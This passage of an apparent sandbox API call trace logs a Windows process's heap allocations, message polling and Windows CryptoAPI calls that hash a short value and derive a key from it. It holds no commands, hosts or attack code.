Flags=0x0, Size=0x14) returned 0x2e69a28 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0263.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0263.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55058, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55108 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.909] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.909] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0263.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51bc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0263.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.911] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0263.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.911] CryptHashData (hHash=0xa87390, pbData=0x2e54f18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0263.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d30 [0263.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.912] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0263.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0263.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.913] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e50 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.914] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0263.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0263.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0263.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0263.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0263.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.923] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0263.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51df0 [0263.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51df0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0263.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.926] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0263.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0263.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0263.927] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87390, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87350) returned 1 [0263.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0263.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.927] 